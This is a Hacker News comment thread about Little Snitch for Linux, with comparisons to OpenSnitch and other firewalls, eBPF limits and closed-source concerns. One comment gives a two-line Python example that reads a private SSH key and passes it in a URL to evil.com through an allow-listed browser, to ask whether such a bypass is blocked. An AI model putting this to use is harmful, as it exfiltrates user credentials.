by alhazrod
14 subcomments
- I remember before Little Snitch there was ZoneAlarm for Windows[0] (here is a good screenshot[1]). No clue if the current version of ZoneAlarm does anything like that (have not used it in 2 decades). I always found it weird that Linux never really had anything like it.
[0]: https://en.wikipedia.org/wiki/ZoneAlarm
[1]: https://d2nwkt1g6n1fev.cloudfront.net/helpmax/wp-content/upl...
- I'm not a Little Snitch or Open Snitch user, I wonder if these firewalls are able to block requests done with the use of some other, allow-listed program.
Say I run a script `suspicious.py' and I deny this script from making any network requests. I also have firefox which is allowed to make any HTTPS requests. If suspicious.py does something like:
key = (Path.home() / '.ssh' / 'id_rsa').read_text()
subprocess.Popen(['firefox', f'https://evil.com/upload/{key}'])
will this request be blocked?
- Recently I was wondering how viable it is to launch a niche, paid tool for Linux. I found that this is a very rare model, most tools are either just free, supported by sponsorship, supported by some paid cloud-based service that accompanies the tool, use an open-core model with paid add-ons.
I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already well established, with working payment infrastructure would be a good candidate.
- I know it sounds crazy at this point, but with popular YouTubers switching to Linux, gamers overall well-aware of Steam on Linux advantages and switching as well, plus popular software like LittleSnitch getting ported, 2026 can without irony be named as Year of Linux Desktop, right?
- Tried it on Fedora 43 (6.19.11 x86_64) and it loaded all CPU cores, dumped 50K lines in the journal and failed to start.
> Error: the BPF_PROG_LOAD syscall returned Argument list too long (os error 7).
> littlesnitch.service: Consumed 3min 38.832s CPU time, 13.7G memory peak.
- How does it compare to opensnitch? https://github.com/evilsocket/opensnitch
by hubabuba44
1 subcomments
- Congrats on the Linux port, this looks very nice.
Shameless plug: for anyone who wants something fully open source and terminal-based, I maintain RustNet (https://github.com/domcyrus/rustnet). It's a bit different because it's a TUI for real-time connection monitoring with deep packet inspection, not a firewall. No blocking/rules, but it's cross-platform (Linux/macOS/Windows), the entire codebase is open, and it sandboxes itself after init via Landlock with capability dropping.
by mathfailure
1 subcomments
- Nice to have this as an extra option, but being a linux user I value openness of code. I am pretty content with opensnitch + opensnitch-ui.
by thewanderer1983
0 subcomment
- Does little snitch and similar software work against solutions like Paqet?
https://github.com/hanselime/paqet
- This has the author's blog post on it https://obdev.at/blog/little-snitch-for-linux/
- Okay hear me out, I use little snitch for a while. Great product. Love finding out what phones where. I make every single request (except my browser, because I'm fine with their sandbox) block until I approve.
Recently I was wondering how you really have to trust something like little snitch given its a full kernel extension effectively able to MITM your whole network stack.
So I went digging (and asked some agents to deep research), and I couldn't find much interesting about the company or its leadership at all.
All a long way to say, anyone know anything about this company?
- >> The macOS version uses deep packet inspection to do this more reliably. That's not an option here.
I thought it would be easier to do DPI on Linux than macOS. No???
by Avicebron
1 subcomments
- Probably should throw it out there that I'm building something inspired by littleSnitch for windows. Currently a bit stealthy about it. But when I crowd source the funding for a code signing cert I'll get it out there. Lots of inspiration from LittleSnitch, in spirit if not actual code.
by tankenmate
1 subcomments
- I'm so surprised that so few people have heard of Portmaster, it's been around for years and runs on Linux (and Windows if you must). And if you don't need traffic history it's free.
by peterspath
1 subcomments
- I really want Little Snitch for iOS.
Hopefully Apple makes the necessary frameworks available on iOS in general. Not only for supervised devices.
- There was a similar Show HN from 3 weeks ago.
https://news.ycombinator.com/item?id=47387443 (open source too) - and there is a live window from all the machines in the swarm. https://dialtoneapp.com/explore - but only 2 so far. Maybe LittleSnitch can generate more data than this? Could end up an immune system for bad actors.
Anything new to get much better performance from low-spec machines that is idiot-proof is a game-changer.
by dSebastien
1 subcomments
- I've been using Simplewall on Windows for a while but I think it's not maintained anymore. Need to find an alternative
- Does it leak your IP like the Mac version?
https://news.ycombinator.com/item?id=35363343
> Little Snitch for Linux is not a security tool.
Maybe not?
> Its focus is privacy:
Or maybe yes?
by mostlysimilar
2 subcomments
- Incredible. LittleSnitch is must-have for macOS and trying to get equivalent functionality on Linux was painful. So very happy to see this, and very happy to give the developers at Objective Development my money.
- Unfortunately it significantly impacts battery life, at least at my tests.
- Will there ever be anything like Comodo Firewall's HIPS firewall on Linux [0]? I remember when firewalls like ZoneAlarm could detect keyboard hooks from keyloggers and such. Comodo Firewall has had this for over a decade, but unfortunately they are not free anymore. For how open Linux is, it surprises me you can't handle things apps are doing on an alert by alert basis, and not just network permissions. Firewalls used to detect DLL injections, apps creating script files to run, adding stuff to start up. Now it seems firewalls only means network detection.
[0] https://help.comodo.com/uploads/Comodo%20Internet%20Security...
by your_challenger
0 subcomment
- I use Lulu on my mac. Is it good enough (compared to LittleSnitch)?
by TheTaytay
1 subcomments
- I’ve been researching the “best” way to build a little outbound network proxy to replace credential placeholders with the real secrets. Since this is designed to secure agents workloads, I figured I might as well add some domain blocking, and other outbound network controls, so I’ve been looking for Little-snitch-like apps to build on.
I’ve been surprised to find that there aren’t a ton of open source “filter and potentially block all outbound connections according to rules”. This seems like the sort of thing that would be in a lot of Linux admins’ toolkit, but I guess not! I appreciate these guys building and releasing this.
by hackingonempty
3 subcomments
- LittleSnitch doesn't tattle on itself phoning home.
by microtonal
0 subcomment
- Wow. I have used Little Snitch on Mac for years, love this!
If anyone from obdev is reading, please give us a way to pay for it, even if it stays free :), I'd love to support development and would happily pay something between the price of Little Snitch and Little Snitch Mini.
Anyway, thanks a lot!
- Related - I'm working on launching Watch.ly[0] (human-in-the-loop for remotely approving network and file system access for agents) in the next week or so. It works similarly, via eBPF (although we can also fall back to NFQUEUE). Supporting 5.x+ linux kernels[1], osx, and windows.
Did not know about LittleSnitch, will definitely check it out.
[0] https://watch.ly/
[1] https://app.watch.ly/status/
- As articulated in the author's own blog post:
https://obdev.at/blog/little-snitch-for-linux/
The core issue is simple and uncomfortable: through automatic updates, a vendor can run any code, with any privileges, on your machine, at any time.
-----
If the author is serious about this, then they should make their own program completely open source, and make builds bit-for-bit reproducible.
For all I know, the proprietary Little Snitch daemon, or even the binaries they're distributing for the open source components, contain backdoors that can be remotely activated to run any code, with any privileges, on your machine, at any time.
- Neat! Too bad it's proprietary closed-source though (at least the daemon is).
by alsetmusic
2 subcomments
- Congrats to Linux users on getting a great tool from a quality development shop. Objective Development is one of our (Mac users) exemplars for attention to detail and fit & finish.
Congrats to Objective Development for expanding their well-loved tool to a new platform. You guys rock.
- Ohhh interesting. Little snitch is one of 2 apps I miss from when the Mac was my daily driver. The other app was pixelmator
- Back when I was still using macOS I loved Little Snitch and was a paying customer. And I agree nothing on Linux comes close. Would it be technically feasible to also provide this as a Flatpak to support immutable distros like Bazzite?
- Giving it a shot right now. Very easy setup, intuitive UI, but a lot of requests' processes are not identified (while they could easily be identified, as they belong to the browser that has some, but less, identified calls)
by 0xbadcafebee
0 subcomment
- > Compatible with Linux kernel 6.12 or higher
I know everyone today is used to upgrading every 5 seconds, but some of us are stuck on old software. For example, my Linux machine keeps rebooting and sucks up power in suspend mode because of buggy drivers in 6.12+, so I'm stuck on 6.8. (which is extra annoying because I bought this laptop for its Linux hardware support...)
by mrbluecoat
5 subcomments
- > The macOS version uses deep packet inspection to do this more reliably. That's not an option here.
Isn't MacOS just *nix under the hood? Genuinely curious about this difference.
- Does anyone know how the blocking functionality works? I worked on some eBPF code a few years ago (when BTF/CO-RE was new), and while it was powerful, you couldn't just write to memory, or make function calls in the kernel.
Is there a userland component that's using something like iptables? (Can iptables block traffic originating from/destined to a specific process nowadays?)
- >The daemon (littlesnitch --daemon) is proprietary, but free to use and redistribute.
Worth noting that it is closed source. Would be worth contributing patches to OpenSnitch to bring it up to parity with Little Snitch.
https://github.com/evilsocket/opensnitch
- I'd like to point out it uses very little memory, barely 33MB here. That's impressive!
- > One thing to be aware of: the .lsrules format from Little Snitch on macOS is not compatible with the Linux version.
Why?
- Also see Safing Port master:
https://safing.io/
- > For keeping tabs on what your software is up to and blocking legitimate software from phoning home, Little Snitch for Linux works well. For hardening a system against a determined adversary, it's not the right tool.
What would be the right tool to harden in a similar way to little snitch on mac? Meaning intercepting any connection and whitelisting them reliably.
- Is there a way to kill little snitch completely without screwing up my DNS/other things?
by SamuelAdams
4 subcomments
- So if this is free to use on linux, what is to stop someone from doing what Colima did to Docker? Aka make a tiny Linux VM on MacOS and package Little Snitch within that?
by akimbostrawman
1 subcomments
- i will never understand why people will flock to this but opensnitch which is just better, fully open and has existed for longer (on linux) gets ignored.
by wodenokoto
0 subcomment
- Honestly I think it is odd such a tool isnøt considered as standard to an OS as a process manager.
Anyway, this one looks great. I hope Linux distros will incorporate this or similar into the network widgets.
by FloatArtifact
1 subcomments
- I wish applications like this could coordinate with upstream firewall like opnsense
by shevy-java
0 subcomment
- The ultimate turnaround would be if the little snitch is snitching on the user too.
- doesn't work on arch (btw)
- Yess, the return of the actually good landing page for the technically-minded. Now all they need to do is roll back the macOS one that looks and reads like it was designed by a marketing agency that knows nothing about computers (or even Little Snitch itself).
- Also from [0].
> You can find Little Snitch for Linux here. It is free, and it will stay that way.
Don't worry, the authors know that there's no point in charging Linux users. Unlike Mac users.
So you might as well make it $0 and the (Linux) crowd goes wild that they don't need to pay a cent.
However...
> I researched a bit, found OpenSnitch, several command line tools, and various security systems built for servers. None of these gave me what I wanted: see which process is making which connections, and in the best case deny with a single click.
OpenSnitch is open source. You don't need to trust it as you can see the code yourself. Little Snitch on the other hand, is completely closed source.
Do you still trust them not to do self-reporting or phoning home, even though it is $0 and closed source?
[0] https://obdev.at/blog/little-snitch-for-linux/
- Dope.
- Can someone elaborate on the limitations bit?
"Little Snitch for Linux is built for privacy, not security, and that distinction matters. The macOS version can make stronger guarantees because it can have more complexity. On Linux, the foundation is eBPF, which is powerful but bounded: it has strict limits on storage size and program complexity. Under heavy traffic, cache tables can overflow, which makes it impossible to reliably tie every network packet to a process or a DNS name. And reconstructing which hostname was originally looked up for a given IP address requires heuristics rather than certainty. The macOS version uses deep packet inspection to do this more reliably. That's not an option here."
Is this a limitation of the eBPF implementation? Pardon my ignorance, I'm genuinely curious about this.
- good
- It’s not really necessary on Linux. Linux systems work without 40 invisible background services phoning home to the mothership to leak your hardware identifiers for FAA702 collection.
by waterTanuki
4 subcomments
- Why would one use this over PiHole?
by valeriozen
0 subcomment
- [dead]
by VladVladikoff
0 subcomment
- Really like Lulu as an alternative to LittleSnitch https://objective-see.org/products/lulu.html
by gauravkashyap6
0 subcomment
- [dead]
by serious_angel
1 subcomments
> The macOS version can make stronger guarantees because it can have more complexity. On Linux, the foundation is eBPF, which is powerful but bounded: it has strict limits on storage size and program complexity. Under heavy traffic, cache tables can overflow, which makes it impossible to reliably tie every network packet to a process or a DNS name.
> And reconstructing which hostname was originally looked up for a given IP address requires heuristics rather than certainty. The macOS version uses deep packet inspection to do this more reliably.
> That's not an option here.
>
> Source: https://web.archive.org/web/20260409002901/https://obdev.at/products/littlesnitch-linux/index.html
The above feels like an utter AI slop nonsense, sorry. I believe eBPF, the Linux Kernel feature, is absolutely capable for accuracy and perfect processing of network traffic.Have you ever checked Calico or Cilium, or at least, Oryx?
- Great website features, exactly what I needed, thank you.
Hacker News
